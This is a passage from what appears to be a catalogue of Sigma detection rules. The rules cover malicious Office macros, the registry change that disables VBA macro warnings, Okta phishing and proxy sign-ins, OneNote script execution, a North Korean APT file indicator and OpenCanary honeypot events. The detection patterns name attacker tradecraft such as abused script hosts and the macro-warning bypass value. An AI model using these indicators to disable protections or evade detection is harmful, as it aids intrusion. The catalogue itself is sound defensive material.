- ':\Windows\SysWOW64\FxsTmp\'
- ':\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System\'
- ':\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter\'
- ':\Windows\Tasks\'
- ':\Windows\Temp\'
- ':\Windows\Tracing\'
- '\AppData\Local\Temp\'
- '\AppData\Roaming\'
condition: all of selection_*
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
Office Macro File Creation From Suspicious Process
Detects the creation of a office macro file from a a suspicious process
view Sigma YAML
title: Office Macro File Creation From Suspicious Process
id: b1c50487-1967-4315-a026-6491686d860e
status: test
description: Detects the creation of a office macro file from a a suspicious process
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md
- https://learn.microsoft.com/en-us/deployoffice/compat/office-file-format-reference
author: frack113, Nasreddine Bencherchali (Nextron Systems)
date: 2022-01-23
modified: 2023-02-22
tags:
- attack.initial-access
- attack.t1566.001
logsource:
category: file_event
product: windows
definition: 'Requirements: The "ParentImage" field is not available by default on EID 11 of Sysmon logs. To be able to use this rule to the full extent you need to enriche the log with additional ParentImage data'
detection:
selection_cmd:
- Image|endswith:
- '\cscript.exe'
- '\mshta.exe'
- '\regsvr32.exe'
- '\rundll32.exe'
- '\wscript.exe'
# Note: ParentImage is a custom field and is not available by default on Sysmon EID 11
- ParentImage|endswith:
- '\cscript.exe'
- '\mshta.exe'
- '\regsvr32.exe'
- '\rundll32.exe'
- '\wscript.exe'
selection_ext:
TargetFilename|endswith:
- '.docm'
- '.dotm'
- '.xlsm'
- '.xltm'
- '.potm'
- '.pptm'
condition: all of selection_*
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Office Macros Warning Disabled
Detects registry changes to Microsoft Office "VBAWarning" to a value of "1" which enables the execution of all macros, whether signed or unsigned.
view Sigma YAML
title: Office Macros Warning Disabled
id: 91239011-fe3c-4b54-9f24-15c86bb65913
related:
- id: 9b894e57-033f-46cf-b7fa-a52804181973
type: obsolete
status: test
description: Detects registry changes to Microsoft Office "VBAWarning" to a value of "1" which enables the execution of all macros, whether signed or unsigned.
references:
- https://twitter.com/inversecos/status/1494174785621819397
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/
- https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/
author: Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems)
date: 2020-05-22
modified: 2024-03-19
tags:
- attack.persistence
- attack.defense-impairment
- attack.t1112
logsource:
category: registry_set
product: windows
detection:
selection:
TargetObject|endswith: '\Security\VBAWarnings'
Details: 'DWORD (0x00000001)'
condition: selection
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
Okta FastPass Phishing Detection
Detects when Okta FastPass prevents a known phishing site.
view Sigma YAML
title: Okta FastPass Phishing Detection
id: ee39a9f7-5a79-4b0a-9815-d36b3cf28d3e
status: test
description: Detects when Okta FastPass prevents a known phishing site.
references:
- https://sec.okta.com/fastpassphishingdetection
- https://developer.okta.com/docs/reference/api/system-log/
- https://developer.okta.com/docs/reference/api/event-types/
author: Austin Songer @austinsonger
date: 2023-05-07
modified: 2026-04-27
tags:
- attack.initial-access
- attack.t1566
logsource:
product: okta
service: okta
detection:
selection:
outcome.reason: 'FastPass declined phishing attempt'
outcome.result: FAILURE
eventType: user.authentication.auth_via_mfa
condition: selection
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
Okta New Admin Console Behaviours
Detects when Okta identifies new activity in the Admin Console.
view Sigma YAML
title: Okta New Admin Console Behaviours
id: a0b38b70-3cb5-484b-a4eb-c4d8e7bcc0a9
status: test
description: Detects when Okta identifies new activity in the Admin Console.
references:
- https://developer.okta.com/docs/reference/api/system-log/
- https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection
author: kelnage
date: 2023-09-07
modified: 2026-04-27
tags:
- attack.privilege-escalation
- attack.persistence
- attack.initial-access
- attack.stealth
- attack.t1078.004
logsource:
product: okta
service: okta
detection:
selection_event:
eventType: 'policy.evaluate_sign_on'
target.displayName: 'Okta Admin Console'
selection_positive:
- debugContext.debugData.behaviors|contains: 'POSITIVE'
- debugContext.debugData.logOnlySecurityData|contains: 'POSITIVE'
condition: all of selection_*
falsepositives:
- When an admin begins using the Admin Console and one of Okta's heuristics incorrectly identifies the behavior as being unusual.
level: high
Convert to SIEM query
high
Okta Suspicious Activity Reported by End-user
Detects when an Okta end-user reports activity by their account as being potentially suspicious.
view Sigma YAML
title: Okta Suspicious Activity Reported by End-user
id: 07e97cc6-aed1-43ae-9081-b3470d2367f1
status: test
description: Detects when an Okta end-user reports activity by their account as being potentially suspicious.
references:
- https://developer.okta.com/docs/reference/api/system-log/
- https://github.com/okta/workflows-templates/blob/1164f0eb71ce47c9ddc7d850e9ab87b5a2b42333/workflows/suspicious_activity_reported/readme.md
author: kelnage
date: 2023-09-07
modified: 2026-04-27
tags:
- attack.resource-development
- attack.t1586.003
logsource:
product: okta
service: okta
detection:
selection:
eventType: 'user.account.report_suspicious_activity_by_enduser'
condition: selection
falsepositives:
- If an end-user incorrectly identifies normal activity as suspicious.
level: high
Convert to SIEM query
high
Okta User Session Start Via An Anonymising Proxy Service
Detects when an Okta user session starts where the user is behind an anonymising proxy service.
view Sigma YAML
title: Okta User Session Start Via An Anonymising Proxy Service
id: bde30855-5c53-4c18-ae90-1ff79ebc9578
status: test
description: Detects when an Okta user session starts where the user is behind an anonymising proxy service.
references:
- https://developer.okta.com/docs/reference/api/system-log/
- https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection
author: kelnage
date: 2023-09-07
modified: 2026-04-27
tags:
- attack.defense-impairment
- attack.t1685
logsource:
product: okta
service: okta
detection:
selection:
eventType: 'user.session.start'
securityContext.isProxy: 'true'
condition: selection
falsepositives:
- If a user requires an anonymising proxy due to valid justifications.
level: high
Convert to SIEM query
high
OneNote.EXE Execution of Malicious Embedded Scripts
Detects the execution of malicious OneNote documents that contain embedded scripts.
When a user clicks on a OneNote attachment and then on the malicious link inside the ".one" file, it exports and executes the malicious embedded script from specific directories.
view Sigma YAML
title: OneNote.EXE Execution of Malicious Embedded Scripts
id: 84b1706c-932a-44c4-ae28-892b28a25b94
status: test
description: |
Detects the execution of malicious OneNote documents that contain embedded scripts.
When a user clicks on a OneNote attachment and then on the malicious link inside the ".one" file, it exports and executes the malicious embedded script from specific directories.
references:
- https://bazaar.abuse.ch/browse/tag/one/
author: '@kostastsale'
date: 2023-02-02
tags:
- attack.stealth
- attack.t1218.001
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\onenote.exe'
Image|endswith:
- '\cmd.exe'
- '\cscript.exe'
- '\mshta.exe'
- '\powershell.exe'
- '\pwsh.exe'
- '\wscript.exe'
CommandLine|contains:
- '\exported\'
- '\onenoteofflinecache_files\'
condition: selection
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
Onyx Sleet APT File Creation Indicators
Detects file creation activity that is related to Onyx Sleet APT activity
view Sigma YAML
title: Onyx Sleet APT File Creation Indicators
id: 2fef4fd9-7206-40d1-b4f5-ad6441d0cd9b
status: test
description: Detects file creation activity that is related to Onyx Sleet APT activity
references:
- https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-10-24
tags:
- attack.execution
- detection.emerging-threats
logsource:
category: file_event
product: windows
detection:
selection:
TargetFilename|endswith: ':\Windows\ADFS\bg\inetmgr.exe'
condition: selection
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
OpenCanary - FTP Login Attempt
Detects instances where an FTP service on an OpenCanary node has had a login attempt.
view Sigma YAML
title: OpenCanary - FTP Login Attempt
id: 6991bc2b-ae2e-447f-bc55-3a1ba04c14e5
status: test
description: Detects instances where an FTP service on an OpenCanary node has had a login attempt.
references:
- https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration
- https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
author: Security Onion Solutions
date: 2024-03-08
tags:
- attack.initial-access
- attack.exfiltration
- attack.lateral-movement
- attack.t1190
- attack.t1021
logsource:
category: application
product: opencanary
detection:
selection:
logtype: 2000
condition: selection
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
OpenCanary - GIT Clone Request
Detects instances where a GIT service on an OpenCanary node has had Git Clone request.
view Sigma YAML
title: OpenCanary - GIT Clone Request
id: 4fe17521-aef3-4e6a-9d6b-4a7c8de155a8
status: test
description: Detects instances where a GIT service on an OpenCanary node has had Git Clone request.
references:
- https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration
- https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
author: Security Onion Solutions
date: 2024-03-08
tags:
- attack.collection
- attack.t1213
logsource:
category: application
product: opencanary
detection:
selection:
logtype: 16001
condition: selection
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
OpenCanary - HTTP GET Request
Detects instances where an HTTP service on an OpenCanary node has received a GET request.
view Sigma YAML
title: OpenCanary - HTTP GET Request
id: af6c3078-84cd-4c68-8842-08b76bd81b13
status: test
description: Detects instances where an HTTP service on an OpenCanary node has received a GET request.
references:
- https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration
- https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
author: Security Onion Solutions
date: 2024-03-08
tags:
- attack.initial-access
- attack.t1190
logsource:
category: application
product: opencanary
detection:
selection:
logtype: 3000
condition: selection
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
OpenCanary - HTTP POST Login Attempt
Detects instances where an HTTP service on an OpenCanary node has had login attempt via Form POST.
view Sigma YAML
title: OpenCanary - HTTP POST Login Attempt
id: af1ac430-df6b-4b38-b976-0b52f07a0252
status: test
description: |
Detects instances where an HTTP service on an OpenCanary node has had login attempt via Form POST.
references:
- https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration
- https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
author: Security Onion Solutions
date: 2024-03-08
tags:
- attack.initial-access
- attack.t1190
logsource:
category: application
product: opencanary
detection:
selection:
logtype: 3001
condition: selection
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
OpenCanary - HTTPPROXY Login Attempt
Detects instances where an HTTPPROXY service on an OpenCanary node has had an attempt to proxy another page.
view Sigma YAML
title: OpenCanary - HTTPPROXY Login Attempt
id: 5498fc09-adc6-4804-b9d9-5cca1f0b8760
status: test
description: |
Detects instances where an HTTPPROXY service on an OpenCanary node has had an attempt to proxy another page.
references:
- https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration
- https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
author: Security Onion Solutions
date: 2024-03-08
tags:
- attack.initial-access
- attack.command-and-control
- attack.t1090
logsource:
category: application
product: opencanary
detection:
selection:
logtype: 7001
condition: selection
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
OpenCanary - Host Port Scan (SYN Scan)
Detects instances where an OpenCanary node has been targeted by a SYN port scan.
view Sigma YAML
title: OpenCanary - Host Port Scan (SYN Scan)
id: 974be8d2-283e-4033-ab08-7505b84204d0
status: experimental
description: Detects instances where an OpenCanary node has been targeted by a SYN port scan.
references:
- https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration
- https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52
author: Marco Pedrinazzi (@pedrinazziM)
date: 2026-01-06
tags:
- attack.discovery
- attack.t1046
logsource:
category: application
product: opencanary
detection:
selection:
logtype: 5001
condition: selection
falsepositives:
- Unlikely
level: high
Convert to SIEM query
Showing 651-700 of 1,715